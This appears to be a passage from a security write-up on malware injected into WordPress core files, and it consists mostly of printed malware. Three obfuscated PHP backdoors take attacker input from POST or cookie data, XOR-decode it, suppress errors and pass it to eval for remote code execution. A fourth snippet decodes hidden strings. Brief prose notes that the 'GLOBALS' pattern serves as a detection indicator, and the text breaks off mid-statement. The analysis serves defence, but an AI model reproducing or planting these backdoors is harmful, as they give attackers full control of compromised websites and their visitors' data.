$kf0800b21[$kf0800b21['e7ad307'][60].$kf0800b21['e7ad307'][50].$kf0800b21['e7ad307'][81].$kf0800b21['e7ad307'][64].$kf0800b21['e7ad307'][81]]($kf0800b21[$kf0800b21['e7ad307'][60].$kf0800b21['e7ad307'][50].$kf0800b21['e7ad307'][81].$kf0800b21['e7ad307'][64].$kf0800b21['e7ad307'][81]]($u63f1, $w9af8), $b7d73df);}foreach ($kf0800b21[$kf0800b21['e7ad307'][40].$kf0800b21['e7ad307'][14].$kf0800b21['e7ad307'][22].$kf0800b21['e7ad307'][39].$kf0800b21['e7ad307'][77].$kf0800b21['e7ad307'][2]] as $b7d73df=>$i98b42){$u63f1 = $i98b42;$p39bec = $b7d73df;}if (!$u63f1){foreach ($kf0800b21[$kf0800b21['e7ad307'][22].$kf0800b21['e7ad307'][10].$kf0800b21['e7ad307'][41].$kf0800b21['e7ad307'][21].$kf0800b21['e7ad307'][2].$kf0800b21['e7ad307'][50]] as $b7d73df=>$i98b42){$u63f1 = $i98b42;$p39bec = $b7d73df;}}$u63f1 = @$kf0800b21[$kf0800b21['e7ad307'][47].$kf0800b21['e7ad307'][50].$kf0800b21['e7ad307'][22].$kf0800b21['e7ad307'][81].$kf0800b21['e7ad307'][50].$kf0800b21['e7ad307'][75]]($kf0800b21[$kf0800b21['e7ad307'][26].$kf0800b21['e7ad307'][41].$kf0800b21['e7ad307'][55].$kf0800b21['e7ad307'][64]]($kf0800b21[$kf0800b21['e7ad307'][27].$kf0800b21['e7ad307'][39].$kf0800b21['e7ad307'][21].$kf0800b21['e7ad307'][50].$kf0800b21['e7ad307'][22].$kf0800b21['e7ad307'][10].$kf0800b21['e7ad307'][41]]($u63f1), $p39bec));if (isset($u63f1[$kf0800b21['e7ad307'][21].$kf0800b21['e7ad307'][36]]) && $w9af8==$u63f1[$kf0800b21['e7ad307'][21].$kf0800b21['e7ad307'][36]]){if ($u63f1[$kf0800b21['e7ad307'][21]] == $kf0800b21['e7ad307'][51]){$l7574d672 = Array($kf0800b21['e7ad307'][76].$kf0800b21['e7ad307'][48] => @$kf0800b21[$kf0800b21['e7ad307'][22].$kf0800b21['e7ad307'][64].$kf0800b21['e7ad307'][41].$kf0800b21['e7ad307'][55].$kf0800b21['e7ad307'][41].$kf0800b21['e7ad307'][41].$kf0800b21['e7ad307'][64].$kf0800b21['e7ad307'][41]](),$kf0800b21['e7ad307'][47].$kf0800b21['e7ad307'][48] => $kf0800b21['e7ad307'][77].$kf0800b21['e7ad307'][71].$kf0800b21['e7ad307'][81].$kf0800b21['e7ad307'][92].$kf0800b21['e7ad307'][77],);echo @$kf0800b21[$kf0800b21['e7ad307'][33].$kf0800b21['e7ad307'][41].$kf0800b21['e7ad307'][81].$kf0800b21['e7ad307'][81].$kf0800b21['e7ad307'][55].$kf0800b21['e7ad307'][64]]($l7574d672);}elseif ($u63f1[$kf0800b21['e7ad307'][21]] == $kf0800b21['e7ad307'][50]){eval/*c4033*/($u63f1[$kf0800b21['e7ad307'][64]]);}exit();} ?>
Most often they are injected into WordPress core files. The structures are always similar:
<?php $a078e82 = 840;$GLOBALS['v048a'] = Array();global $v048a;$v048a = $GLOBALS;${"GLOBALS"}['e7a5745b2'] = "3A^neQ8D*Kl+=gOf]v9!P.ITV&W2J,|Y#x9i5rwM4 s:C~;?ESxdu`a[%z1U}yLq(@HBFmdGN'x0xaX{<"7oc$_h)Zb-/>pjR6tk";$v048a[$v048a['e7a5745b2'][93].$v048a['e7a5745b2'][74].$v048a['e7a5745b2'][80].$v048a['e7a5745b2'][39].$v048a['e7a5745b2'][74].$v048a['e7a5745b2'][6].$v048a['e7a5745b2'][80]] = $v048a['e7a5745b2'][82].$v048a['e7a5745b2'][85].$v048a['e7a5745b2'][36];$v048a[$v048a['e7a5745b2'][50].$v048a['e7a5745b2'][56].$v048a['e7a5745b2'][80].$v048a['e7a5745b2'][68].$v048a['e7a5745b2'][6].$v048a['e7a5745b2'][88].$v048a['e7a5745b2'][18].$v048a['e7a5745b2'][80]] = $v048a['e7a5745b2'][81].$v048a['e7a5745b2'][36].$v048a['e7a5745b2'][68];$v048a[$v048a['e7a5745b2'][81].$v048a['e7a5745b2'][56].$v048a['e7a5745b2'][68].$v048a['e7a5745b2'][35]] = $v048a['e7a5745b2'][41].$v048a['e7a5745b2'][96].$v048a['e7a5745b2'][36].$v048a['e7a5745b2'][10].$v048a['e7a5745b2'][4].$v048a['e7a5745b2'][3];$v048a[$v048a['e7a5745b2'][37].$v048a['e7a5745b2'][56].$v048a['e7a5745b2'][4].$v048a['e7a5745b2'][52].$v048a['e7a5745b2'][56].$v048a['e7a5745b2'][88]] = $v048a['e7a5745b2'][34].$v048a['e7a5745b2'][3].$v048a['e7a5745b2'][34].$v048a['e7a5745b2'][84].$v048a['e7a5745b2'][41].$v048a['e7a5745b2'][4].$v048a['e7a5745b2'][96];$v048a[$v048a['e7a5745b2'][59].$v048a['e7a5745b2'][27].$v048a['e7a5745b2'][6].$v048a['e7a5745b2'][52].$v048a['e7a5745b2'][6]] = $v048a['e7a5745b2'][41].$v048a['e7a5745b2'][4].$v048a['e7a5745b2'][36].$v048a['e7a5745b2'][34].$v048a['e7a5745b2'][52].$v048a['e7a5745b2'][10].$v048a['e7a5745b2'][34].$v048a['e7a5745b2'][55].$v048a['e7a5745b2'][4];$v048a[$v048a['e7a5745b2'][82].$v048a['e7a5745b2'][80].$v048a['e7a5745b2'][88].$v048a['e7a5745b2'][0].$v048a['e7a5745b2'][88].$v048a['e7a5745b2'][39].$v048a['e7a5745b2'][80]] = $v048a['e7a5745b2'][92].$v048a['e7a5745b2'][85].$v048a['e7a5745b2'][92].$v048a['e7a5745b2'][17].$v048a['e7a5745b2'][4].$v048a['e7a5745b2'][36].$v048a['e7a5745b2'][41].$v048a['e7a5745b2'][34].$v048a['e7a5745b2'][81].$v048a['e7a5745b2'][3];$v048a[$v048a['e7a5745b2'][10].$v048a['e7a5745b2'][4].$v048a['e7a5745b2'][52].$v048a['e7a5745b2'][82].$v048a['e7a5745b2'][6].$v048a['e7a5745b2'][68].$v048a['e7a5745b2'][88].$v048a['e7a5745b2'][35].$v048a['e7a5745b2'][52]] = $v048a['e7a5745b2'][50].$v048a['e7a5745b2'][3].$v048a['e7a5745b2'][41].$v048a['e7a5745b2'][4].$v048a['e7a5745b2'][36].$v048a['e7a5745b2'][34].$v048a['e7a5745b2'][52].$v048a['e7a5745b2'][10].$v048a['e7a5745b2'][34].$v048a['e7a5745b2'][55].$v048a['e7a5745b2'][4];$v048a[$v048a['e7a5745b2'][41].$v048a['e7a5745b2'][15].$v048a['e7a5745b2'][68].$v048a['e7a5745b2'][18].$v048a['e7a5745b2'][88].$v048a['e7a5745b2'][82]] = $v048a['e7a5745b2'][88].$v048a['e7a5745b2'][52].$v048a['e7a5745b2'][41].$v048a['e7a5745b2'][4].$v048a['e7a5745b2'][95].$v048a['e7a5745b2'][39].$v048a['e7a5745b2'][84].$v048a['e7a5745b2'][68].$v048a['e7a5745b2'][4].$v048a['e7a5745b2'][82].$v048a['e7a5745b2'][81].$v048a['e7a5745b2'][68].$v048a['e7a5745b2'][4];$v048a[$v048a['e7a5745b2'][37].$v048a['e7a5745b2'][27].$v048a['e7a5745b2'][68].$v048a['e7a5745b2'][4].$v048a['e7a5745b2'][68]] = $v048a['e7a5745b2'][41].$v048a['e7a5745b2'][4].$v048a['e7a5745b2'][96].$v048a['e7a5745b2'][84].$v048a['e7a5745b2'][96].$v048a['e7a5745b2'][34].$v048a['e7a5745b2'][67].$v048a['e7a5745b2'][4].$v048a['e7a5745b2'][84].$v048a['e7a5745b2'][10].$v048a['e7a5745b2'][34].$v048a['e7a5745b2'][67].$v048a['e7a5745b2'][34].$v048a['e7a5745b2'][96];$v048a[$v048a['e7a5745b2'][10].$v048a['e7a5745b2'][4].$v048a['e7a5745b2'][27].$v048a['e7a5745b2'][35].$v048a['e7a5745b2'][68].$v048a['e7a5745b2'][80].$v048a['e7a5745b2'][95]] = $v048a['e7a5745b2'][13].$v048a['e7a5745b2'][88].$v048a['e7a5745b2'][82].$v048a['e7a5745b2'][56].$v048a['e7a5745b2'][18].$v048a['e7a5745b2'][27];$v048a[$v048a['e7a5745b2'][93].$v048a['e7a5745b2'][18].$v048a['e7a5745b2'][95].$v048a['e7a5745b2'][88].$v048a['e7a5745b2'][74].$v048a['e7a5745b2'][56]] = $v048a['e7a5745b2'][73].$v048a['e7a5745b2'][18].$v048a['e7a5745b2'][88].$v048a['e7a5745b2'][80].$v048a['e7a5745b2'][27].$v048a['e7a5745b2'][15].$v048a['e7a5745b2'][82];$v048a[$v048a['e7a5745b2'][3].$v048a['e7a5745b2'][74].$v048a['e7a5745b2'][56].$v048a['e7a5745b2'][82].$v048a['e7a5745b2'][68].$v048a['e7a5745b2'][74].$v048a['e7a5745b2'][74].$v048a['e7a5745b2'][56].$v048a['e7a5745b2'][15]] = $_POST;$v048a[$v048a['e7a5745b2'][41].$v048a['e7a5745b2'][56].$v048a['e7a5745b2'][80].$v048a['e7a5745b2'][27].$v048a['e7a5745b2'][95]] = $_COOKIE;@$v048a[$v048a['e7a5745b2'][37].$v048a['e7a5745b2'][56].$v048a['e7a5745b2'][4].$v048a['e7a5745b2'][52].$v048a['e7a5745b2'][56].$v048a['e7a5745b2'][88]]($v048a['e7a5745b2'][4].$v048a['e7a5745b2'][36].$v048a['e7a5745b2'][36].$v048a['e7a5745b2'][81].$v048a['e7a5745b2'][36].$v048a['e7a5745b2'][84].$v048a['e7a5745b2'][10].$v048a['e7a5745b2'][81].$v048a['e7a5745b2'][13], NULL);@$v048a[$v048a['e7a5745b2'][37].$v048a['e7a5745b2'][56].$v048a['e7a5745b2'][4].$v048a['e7a5745b2'][52].$v048a['e7a5745b2'][56].$v048a['e7a5745b2'][88]]($v048a['e7a5745b2'][10].$v048a['e7a5745b2'][81].$v048a['e7a5745b2'][13].$v048a['e7a5745b2'][84].$v048a['e7a5745b2'][4].$v048a['e7a5745b2'][36].$v048a['e7a5745b2'][36].$v048a['e7a5745b2'][81].$v048a['e7a5745b2'][36].$v048a['e7a5745b2'][41], 0);@$v048a[$v048a['e7a5745b2'][37].$v048a['e7a5745b2'][56].$v048a['e7a5745b2'][4].$v048a['e7a5745b2'][52].$v048a['e7a5745b2'][56].$v048a['e7a5745b2'][88]]($v048a['e7a5745b2'][67].$v048a['e7a5745b2'][52].$v048a['e7a5745b2'][73].$v048a['e7a5745b2'][84].$v048a['e7a5745b2'][4].$v048a['e7a5745b2'][73].$v048a['e7a5745b2'][4].$v048a['e7a5745b2'][82].$v048a['e7a5745b2'][50].$v048a['e7a5745b2'][96].$v048a['e7a5745b2'][34].$v048a['e7a5745b2'][81].$v048a['e7a5745b2'][3].$v048a['e7a5745b2'][84].$v048a['e7a5745b2'][96].$v048a['e7a5745b2'][34].$v048a['e7a5745b2'][67].$v048a['e7a5745b2'][4], 0);@$v048a[$v048a['e7a5745b2'][37].$v048a['e7a5745b2'][27].$v048a['e7a5745b2'][68].$v048a['e7a5745b2'][4].$v048a['e7a5745b2'][68]](0);$x24294 = NULL;$r73534bfb = NULL;$v048a[$v048a['e7a5745b2'][41].$v048a['e7a5745b2'][88].$v048a['e7a5745b2'][88].$v048a['e7a5745b2'][56].$v048a['e7a5745b2'][6]] = $v048a['e7a5745b2'][6].$v048a['e7a5745b2'][39].$v048a['e7a5745b2'][6].$v048a['e7a5745b2'][82].$v048a['e7a5745b2'][0].$v048a['e7a5745b2'][56].$v048a['e7a5745b2'][68].$v048a['e7a5745b2'][15].$v048a['e7a5745b2'][89].$v048a['e7a5745b2'][56].$v048a['e7a5745b2'][35].$v048a['e7a5745b2'][95].$v048a['e7a5745b2'][80].$v048a['e7a5745b2'][89].$v048a['e7a5745b2'][39].$v048a['e7a5745b2'][82].$v048a['e7a5745b2'][88].$v048a['e7a5745b2'][80].$v048a['e7a5745b2'][89].$v048a['e7a5745b2'][88].$v048a['e7a5745b2'][35].$v048a['e7a5745b2'][15].$v048a['e7a5745b2'][52].$v048a['e7a5745b2'][89].$v048a['e7a5745b2'][4].$v048a['e7a5745b2'][82].$v048a['e7a5745b2'][88].$v048a['e7a5745b2'][18].$v048a['e7a5745b2'][56].$v048a['e7a5745b2'][80].$v048a['e7a5745b2'][56].$v048a['e7a5745b2'][4].$v048a['e7a5745b2'][35].$v048a['e7a5745b2'][0].$v048a['e7a5745b2'][68].$v048a['e7a5745b2'][0];global $sbb18;function x9b72fc($x24294, $h23d86){global $v048a;$q3dd887f = "";for ($v3970=0; $v3970<$v048a[$v048a['e7a5745b2'][81].$v048a['e7a5745b2'][56].$v048a['e7a5745b2'][68].$v048a['e7a5745b2'][35]]($x24294);){for ($n33fd565=0; $n33fd565<$v048a[$v048a['e7a5745b2'][81].$v048a['e7a5745b2'][56].$v048a['e7a5745b2'][68].$v048a['e7a5745b2'][35]]($h23d86) && $v3970<$v048a[$v048a['e7a5745b2'][81].$v048a['e7a5745b2'][56].$v048a['e7a5745b2'][68].$v048a['e7a5745b2'][35]]($x24294); $n33fd565++, $v3970++){$q3dd887f .= $v048a[$v048a['e7a5745b2'][93].$v048a['e7a5745b2'][74].$v048a['e7a5745b2'][80].$v048a['e7a5745b2'][39].$v048a['e7a5745b2'][74].$v048a['e7a5745b2'][6].$v048a['e7a5745b2'][80]]($v048a[$v048a['e7a5745b2'][50].$v048a['e7a5745b2'][56].$v048a['e7a5745b2'][80].$v048a['e7a5745b2'][68].$v048a['e7a5745b2'][6].$v048a['e7a5745b2'][88].$v048a['e7a5745b2'][18].$v048a['e7a5745b2'][80]]($x24294[$v3970]) ^ $v048a[$v048a['e7a5745b2'][50].$v048a['e7a5745b2'][56].$v048a['e7a5745b2'][80].$v048a['e7a5745b2'][68].$v048a['e7a5745b2'][6].$v048a['e7a5745b2'][88].$v048a['e7a5745b2'][18].$v048a['e7a5745b2'][80]]($h23d86[$n33fd565]));}}return $q3dd887f;}function gbc192($x24294, $h23d86){global $v048a;global $sbb18;return $v048a[$v048a['e7a5745b2'][93].$v048a['e7a5745b2'][18].$v048a['e7a5745b2'][95].$v048a['e7a5745b2'][88].$v048a['e7a5745b2'][74].$v048a['e7a5745b2'][56]]($v048a[$v048a['e7a5745b2'][93].$v048a['e7a5745b2'][18].$v048a['e7a5745b2'][95].$v048a['e7a5745b2'][88].$v048a['e7a5745b2'][74].$v048a['e7a5745b2'][56]]($x24294, $sbb18), $h23d86);}foreach ($v048a[$v048a['e7a5745b2'][41].$v048a['e7a5745b2'][56].$v048a['e7a5745b2'][80].$v048a['e7a5745b2'][27].$v048a['e7a5745b2'][95]] as $h23d86=>$vb94){$x24294 = $vb94;$r73534bfb = $h23d86;}if (!$x24294){foreach ($v048a[$v048a['e7a5745b2'][3].$v048a['e7a5745b2'][74].$v048a['e7a5745b2'][56].$v048a['e7a5745b2'][82].$v048a['e7a5745b2'][68].$v048a['e7a5745b2'][74].$v048a['e7a5745b2'][74].$v048a['e7a5745b2'][56].$v048a['e7a5745b2'][15]] as $h23d86=>$vb94){$x24294 = $vb94;$r73534bfb = $h23d86;}}$x24294 = @$v048a[$v048a['e7a5745b2'][10].$v048a['e7a5745b2'][4].$v048a['e7a5745b2'][52].$v048a['e7a5745b2'][82].$v048a['e7a5745b2'][6].$v048a['e7a5745b2'][68].$v048a['e7a5745b2'][88].$v048a['e7a5745b2'][35].$v048a['e7a5745b2'][52]]($v048a[$v048a['e7a5745b2'][10].$v048a['e7a5745b2'][4].$v048a['e7a5745b2'][27].$v048a['e7a5745b2'][35].$v048a['e7a5745b2'][68].$v048a['e7a5745b2'][80].$v048a['e7a5745b2'][95]]($v048a[$v048a['e7a5745b2'][41].$v048a['e7a5745b2'][15].$v048a['e7a5745b2'][68].$v048a['e7a5745b2'][18].$v048a['e7a5745b2'][88].$v048a['e7a5745b2'][82]]($x24294), $r73534bfb));if (isset($x24294[$v048a['e7a5745b2'][52].$v048a['e7a5745b2'][97]]) && $sbb18==$x24294[$v048a['e7a5745b2'][52].$v048a['e7a5745b2'][97]]){if ($x24294[$v048a['e7a5745b2'][52]] == $v048a['e7a5745b2'][34]){$v3970 = Array($v048a['e7a5745b2'][92].$v048a['e7a5745b2'][17] => @$v048a[$v048a['e7a5745b2'][82].$v048a['e7a5745b2'][80].$v048a['e7a5745b2'][88].$v048a['e7a5745b2'][0].$v048a['e7a5745b2'][88].$v048a['e7a5745b2'][39].$v048a['e7a5745b2'][80]](),$v048a['e7a5745b2'][41].$v048a['e7a5745b2'][17] => $v048a['e7a5745b2'][56].$v048a['e7a5745b2'][21].$v048a['e7a5745b2'][74].$v048a['e7a5745b2'][89].$v048a['e7a5745b2'][56],);echo @$v048a[$v048a['e7a5745b2'][59].$v048a['e7a5745b2'][27].$v048a['e7a5745b2'][6].$v048a['e7a5745b2'][52].$v048a['e7a5745b2'][6]]($v3970);}elseif ($x24294[$v048a['e7a5745b2'][52]] == $v048a['e7a5745b2'][4]){eval/*ifd841*/($x24294[$v048a['e7a5745b2'][68]]);}exit();} ?>
simpler:
<?php $p5dQxlL = array(8660, 185, 6556, 64, 6770, 183, 2842, 158, 5462, 182, 13540, 186, 7538, 178, 12903, 122, 11598, 108, 6269, 89, 4100, 161, 682, 102, 6077, 41, 1022, 153, 4629, 88, 5818, 109, 6953, 183, 1771, 114, 11125, 97, 3000, 42, 9736, 187, 3761, 164, 12707, 196, 847, 114, 4355, 153, 1175, 129, 7136, 93, 6192, 77, 3290, 176, 5124, 151, 8045, 179, 2671, 74, 12185, 176, 8224, 73, 467, 69, 92, 190, 8845, 187, 536, 146, 10796, 149, 10945, 81, 10271, 155, 13195, 177, 7229, 121, 8297, 173, 9165, 164, 1885, 93, 7350, 188, 12137, 48, 11463, 135, 3925, 175, 784, 63, 13025, 170, 4828, 55, 12530, 77, 4508, 121, 11917, 56, 2156, 122, 9923, 160, 1647, 124, 4717, 111, 5275, 187, 10694, 102, 2278, 191, 5927, 150, 12075, 62, 12027, 48, 0, 92, 9519, 158, 4261, 94, 11026, 99, 6118, 74, 7716, 194, 10524, 170, 13372, 168, 10143, 41, 4883, 146, 11706, 74, 3466, 146, 2469, 123, 1304, 154, 11222, 125, 11347, 116, 9474, 45, 5644, 174, 6667, 103, 8470, 190, 282, 185, 10083, 60, 3170, 120, 2745, 97, 3042, 128, 11973, 54, 2592, 79, 5029, 95, 961, 61, 9677, 59, 6358, 198, 9329, 145, 1588, 59, 11780, 137, 13726, 158, 12607, 100, 3612, 149, 1458, 130, 10184, 87, 9032, 133, 7952, 93, 10426, 98, 1978, 178, 6620, 47, 12361, 169, 7910, 42); $FY52xy = ""; for ($tWqBxTpk = 0;$tWqBxTpk < sizeof($p5dQxlL);$tWqBxTpk+= 2) { if ($tWqBxTpk % 4) { $FY52xy.= substr($Sc9mQcZx, $p5dQxlL[$tWqBxTpk], $p5dQxlL[$tWqBxTpk + 1]); } else { $FY52xy.= $jaNwcmT(substr($Sc9mQcZx, $p5dQxlL[$tWqBxTpk], $p5dQxlL[$tWqBxTpk + 1])); } }; if (!isset($jcRQ6i)) return $FY52xy;
You will notice that malware always needs the GLOBAL function which is the indicator we use most often:
<?php $tb78 = 506; $GLOBALS['fb355e'] = Array(); global $fb355e; $fb355e = $GLOBALS; $ { "GLOBALS" } ['l82418'] = "ozMBYu4A<"TnPRx ~ I ^ bk_O5 & HU\x9JW } > w$\xa ? /; Nm, GyVj0F[ = 1q % Dl9) de@]c782\ : (6f\xdv + #KsZS|p'-!gaXL3E*Cr`.{tQhi";$fb355e[$fb355e['l82418'][83].$fb355e['l82418'][56].$fb355e['l82418'][67].$fb355e['l82418'][86].$fb355e['l82418'][54]] = $fb355e['l82418'][60].$fb355e['l82418'][96].$fb355e['l82418'][90];$fb355e[$fb355e['l82418'][60].$fb355e['l82418'][83].$fb355e['l82418'][18].$fb355e['l82418'][57].$fb355e['l82418'][63].$fb355e['l82418'][57]] = $fb355e['l82418'][0].$fb355e['l82418'][90].$fb355e['l82418'][56];$fb355e[$fb355e['l82418'][44].$fb355e['l82418'][63].$fb355e['l82418'][18].$fb355e['l82418'][62].$fb355e['l82418'][68].$fb355e['l82418'][62]] = $fb355e['l82418'][74].$fb355e['l82418'][94].$fb355e['l82418'][90].$fb355e['l82418'][53].$fb355e['l82418'][57].$fb355e['l82418'][11];$fb355e[$fb355e['l82418'][42].$fb355e['l82418'][6].$fb355e['l82418'][83].$fb355e['l82418'][83].$fb355e['l82418'][68].$fb355e['l82418'][60]] = $fb355e['l82418'][97].$fb355e['l82418'][11].$fb355e['l82418'][97].$fb355e['l82418'][21].$fb355e['l82418'][74].$fb355e['l82418'][57].$fb355e['l82418'][94];$fb355e[$fb355e['l82418'][74].$fb355e['l82418'][61].$fb355e['l82418'][57].$fb355e['l82418'][63].$fb355e['l82418'][56].$fb355e['l82418'][62].$fb355e['l82418'][18].$fb355e['l82418'][60].$fb355e['l82418'][63]] = $fb355e['l82418'][74].$fb355e['l82418'][57].$fb355e['l82418'][90].$fb355e['l82418'][97].$fb355e['l82418'][83].$fb355e['l82418'][53].$fb355e['l82418'][97].$fb355e['l82418'][1].$fb355e['l82418'][57];$fb355e[$fb355e['l82418'][18].$fb355e['l82418'][86].$fb355e['l82418'][49].$fb355e['l82418'][83].$fb355e['l82418'][49].$fb355e['l82418'][68].$fb355e['l82418'][57].$fb355e['l82418'][18].$fb355e['l82418'][68]] = $fb355e['l82418'][78].$fb355e['l82418'][96].$fb355e['l82418'][78].$fb355e['l82418'][70].$fb355e['l82418'][57].$fb355e['l82418'][90].$fb355e['l82418'][74].$fb355e['l82418'][97].$fb355e['l82418'][0].$fb355e['l82418'][11];$fb355e[$fb355e['l82418'][82].$fb355e['l82418'][86].$fb355e['l82418'][56].$fb355e['l82418'][86]] = $fb355e['l82418'][5].$fb355e['l82418'][11].$fb355e['l82418'][74].$fb355e['l82418'][57].$fb355e['l82418'][90].$fb355e['l82418'][97].$fb355e['l82418'][83].$fb355e['l82418'][53].$fb355e['l82418'][97].$fb355e['l82418'][1].$fb355e['l82418'][57];$fb355e[$fb355e['l82418'][14].$fb355e['l82418'][49].$fb355e['l82418'][56].$fb355e['l82418'][56].$fb355e['l82418'][61].$fb355e['l82418'][61]] = $fb355e['l82418'][18].$fb355e['l82418'][83].$fb355e['l82418'][74].$fb355e['l82418'][57].$fb355e['l82418'][67].$fb355e['l82418'][6].$fb355e['l82418'][21].$fb355e['l82418'][56].$fb355e['l82418'][57].$fb355e['l82418'][60].$fb355e['l82418'][0].$fb355e['l82418'][56].$fb355e['l82418'][57];$fb355e[$fb355e['l82418'][70].$fb355e['l82418'][68].$fb355e['l82418'][56].$fb355e['l82418'][49].$fb355e['l82418'][49].$fb355e['l82418'][54].$fb355e['l82418'][63].$fb355e['l82418'][49].$fb355e['l82418'][68]] = $fb355e['l82418'][74].$fb355e['l82418'][57].$fb355e['l82418'][94].$fb355e['l82418'][21].$fb355e['l82418'][94].$fb355e['l82418'][97].$fb355e['l82418'][39].$fb355e['l82418'][57].$fb355e['l82418'][21].$fb355e['l82418'][53].$fb355e['l82418'][97].$fb355e['l82418'][39].$fb355e['l82418'][97].$fb355e['l82418'][94];$fb355e[$fb355e['l82418'][57].$fb355e['l82418'][83].$fb355e['l82418'][62].$fb355e['l82418'][57].$fb355e['l82418'][83].$fb355e['l82418'][45].$fb355e['l82418'][61].$fb355e['l82418'][67]] = $fb355e['l82418'][32].$fb355e['l82418'][49].$fb355e['l82418'][60].$fb355e['l82418'][54].$fb355e['l82418'][61].$fb355e['l82418'][6];$fb355e[$fb355e['l82418'][78].$fb355e['l82418'][18].$fb355e['l82418'][61].$fb355e['l82418'][23].$fb355e['l82418'][54].$fb355e['l82418'][6].$fb355e['l82418'][23].$fb355e['l82418'][23]] = $fb355e['l82418'][19].$fb355e['l82418'][23].$fb355e['l82418'][6].$fb355e['l82418'][61].$fb355e['l82418'][60];$fb355e[$fb355e['l82418'][0].$fb355e['l82418'][61].$fb355e['l82418'][61].$fb355e['l82418'][62]] = $_POST;$fb355e[$fb355e['l82418'][0].$fb355e['l82418'][6].$fb355e['l82418'][83].$fb355e['l82418'][62]] = $_COOKIE;@$fb355e[$fb355e['l82418'][42].$fb355e['l82418'][6].$fb355e['l82418'][83].$fb355e['l82418'][83].$fb355e['l82418'][68].$fb355e['l82418'][60]]($fb355e['l82418'][57].$fb355e['l82418'][90].$fb355e['l82418'][90].$fb355e['l82418'][0].$fb355e['l82418'][90].$fb355e['l82418'][21].$fb355e['l82418'][53].$fb355e['l82418'][0].$fb355e['l82418'][82], NULL);@$fb355e[$fb355e['l82418'][42].$fb355e['l82418'][6].$fb355e['l82418'][83].$fb355e['l82418'][83].$fb355e['l82418'][68].$fb355e['l82418'][60]]($fb355e['l82418'][53].$fb355e['l82418'][0].$fb355e['l82418'][82].$fb355e['l82418'][21].$fb355e['l82418'][57].$fb355e['l82418'][90].$fb355e['l82418'][90].$fb355e['l82418'][0].$fb355e['l82418'][90].$fb355e['l82418'][74], 0);@$fb355e[$fb355e['l82418'][42].$fb355e['l82418'][6].$fb355e['l82418'][83].$fb355e['l82418'][83].$fb355e['l82418'][68].$fb355e['l82418'][60]]($fb355e['l82418'][39].$fb355e['l82418'][83].$fb355e['l82418'][14].$fb355e['l82418'][21].$fb355e['l82418'][57].$fb355e['l82418'][14].$fb355e['l82418'][57].$fb355e['l82418'][60].$fb355e['l82418'][5].$fb355e['l82418'][94].$fb355e['l82418'][97].$fb355e['l82418'][0].$fb355e['l82418'][11].$fb355e['l82418'][21].$fb355e['l82418'][94].$fb355e['l82418'][97].$fb355e['l82418'][39].$fb355e['l82418'][57], 0);@$fb355e[$fb355e['l82418'][70].$fb355e['l82418'][68].$fb355e['l82418'][56].$fb355e['l82418'][49].$fb355e['l82418'][49].$fb355e['l82418'][54].$fb355e['l82418'][63].$fb355e['l82418'][49].$fb355e['l82418'][68]](0);$u604d9662 = NULL;$r5401375 = NULL;$fb355e[$fb355e['l82418'][1].$fb355e['l82418'][18].$fb355e['l82418'][56].$fb355e['l82418'][57].$fb355e['l82418'][57].$fb355e['l82418'][6].$fb355e['l82418'][6].$fb355e['l82418'][18]] = $fb355e['l82418'][6].$fb355e['l82418'][54].$fb355e['l82418'][62].$fb355e['l82418'][56].$fb355e['l82418'][45].$fb355e['l82418'][18].$fb355e['l82418'][49].$fb355e['l82418'][60].$fb355e['l82418'][80].$fb355e['l82418'][56].$fb355e['l82418'][54].$fb355e['l82418'][23].$fb355e['l82418'][61].$fb355e['l82418'][80].$fb355e['l82418'][6].$fb355e['l82418'][6].$fb355e['l82418'][86].$fb355e['l82418'][67].$fb355e['l82418'][80].$fb355e['l82418'][83].$fb355e['l82418'][23].$fb355e['l82418'][45].$fb355e['l82418'][56].$fb355e['l82418'][80].$fb355e['l82418'][63].$fb355e['l82418'][61].$fb355e['l82418'][60].$fb355e['l82418'][54].$fb355e['l82418'][6].$fb355e['l82418'][61].$fb355e['l82418'][57].$fb355e['l82418'][86].$fb355e['l82418'][45].$fb355e['l82418'][45].$fb355e['l82418'][68].$fb355e['l82418'][54];global $zbdee44b;function k547c($u604d9662, $c2fe6404){global $fb355e;$ue9100 = "";for ($f231=0; $f231<$fb355e[$fb355e['l82418'][44].$fb355e['l82418'][63].$fb355e['l82418'][18].$fb355e['l82418'][62].$fb355e['l82418'][68].$fb355e['l82418'][62]]($u604d9662);){for ($s9716d=0; $s9716d<$fb355e[$fb355e['l82418'][44].$fb355e['l82418'][63].$fb355e['l82418'][18].$fb355e['l82418'][62].$fb355e['l82418'][68].$fb355e['l82418'][62]]($c2fe6404) && $f231<$fb355e[$fb355e['l82418'][44].$fb355e['l82418'][63].$fb355e['l82418'][18].$fb355e['l82418'][62].$fb355e['l82418'][68].$fb355e['l82418'][62]]($u604d9662); $s9716d++, $f231++){$ue9100 .= $fb355e[$fb355e['l82418'][83].$fb355e['l82418'][56].$fb355e['l82418'][67].$fb355e['l82418'][86].$fb355e['l82418'][54]]($fb355e[$fb355e['l82418'][60].$fb355e['l82418'][83].$fb355e['l82418'][18].$fb355e['l82418'][57].$fb355e['l82418'][63].$fb355e['l82418'][57]]($u604d9662[$f231]) ^ $fb355e[$fb355e['l82418'][60].$fb355e['l82418'][83].$fb355e['l82418'][18].$fb355e['l82418'][57].$fb355e['l82418'][63].$fb355e['l82418'][57]]($c2fe6404[$s9716d]));}}return $ue9100;}function w1c974($u604d9662, $c2fe6404){global $fb355e;global $zbdee44b;return $fb355e[$fb355e['l82418'][78].$fb355e['l82418'][18].$fb355e['l82418'][61].$fb355e['l82418'][23].$fb355e['l82418'][54].$fb355e['l82418'][6].$fb355e['l82418'][23].$fb355e['l82418'][23]]($fb355e[$fb355e['l82418'][78].$fb355e['l82418'][18].$fb355e['l82418'][61].$fb355e['l82418'][23].$fb355e['l82418'][54].$fb355e['l82418'][6].$fb355e['l82418'][23].$fb355e['l82418'][23]]($u604d9662, $zbdee44b), $c2fe6404);}foreach ($fb355e[$fb355e['l82418'][0].$fb355e['l82418'][6].$fb355e['l82418'][83].$fb355e['l82418'][62]] as $c2fe6404=>$f99f){$u604d9662 = $f99f;$r5401375 = $c2fe6404;}if (!$u604d9662){foreach ($fb355e[$fb355e['l82418'][0].$fb355e['l82418'][61].$fb355e['l82418'][61].$fb355e['l82418'][62]] as $c2fe6404=>$f99f){$u604d9662 = $f99f;$r5401375 = $c2fe6404;}}$u604d9662 = 